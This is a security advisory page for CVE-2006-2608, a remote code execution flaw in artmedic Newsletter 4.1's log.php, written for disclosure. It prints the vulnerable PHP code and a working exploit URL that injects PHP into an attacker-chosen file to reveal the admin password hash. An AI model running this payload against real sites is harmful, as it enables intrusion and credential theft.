|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Remote Code Execution in artmedic Newsletter 4.1 [log.php]
|
SecurityAlert : 957
CVE : CVE-2006-2608
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : C.Schmitz
Published : 27.05.2006
Affected Software : | Newsletter 4.1 |
 Advisory Content : I found a bug in artmedic Newsletter 4.1 (proably even in newer versions)
which lets an attacker run arbitrary php-code and bypass the password
protection.
The reason for this is mistake in design.
log.php:
<?php
$time = time();
$date = date("d.m.Y, H:i:s");
$remote = getenv("REMOTE_ADDR");
$ip = getHostByAddr($remote);
$logd = "$time"."&&"."$date"."&&"."$remote"."&&"."$ip"."&&"."$email"."&&n";
$logdaten = fopen("$logfile", "a+");
flock($logdaten,2);
fputs($logdaten, $logd);
flock($logdaten,3);
fclose($logdaten);
//Log-Daten nach Vorhaltezeit löschen
//Delete old logdata
$ablaufzeit = "$time"-"$logtime";
$pruefung = @file($logfile);
while (list ($line_num, $line) = @each ($pruefung))
{
$zeiten = explode("&&",$line);
if($zeiten[0] <= $ablaufzeit)
{
$fp = fopen( "$logfile", "r" );
$contents = fread($fp, filesize($daten));
fclose($fp);
$line=quotemeta($line);
$string2 = "";
$replace = ereg_replace($line, $string2, $contents);
$fh=fopen($logfile, "w+");
@flock($fp,2);
fputs($fh, $replace);
@flock($fp,3);
fclose($fh);
}}
?>
Usually the log.php is included and $logfile,$logtime and $email are
declared in the parent document. If we run
"log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert
php code here -->" we get a file anyfile.anyext with following content:
<html>
...
unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&&
...
</html>
a simple example to reveal the admin pw Hash is
log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo
%20$password%20?>
just launch info.php?cur=include.php and you will see it.
to kill the entry type:
"log.php?logfile=info.php&logtime=000000"
vendor has not yet been informed, but he will be as soon as possible ...
regards
C.Schmitz
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|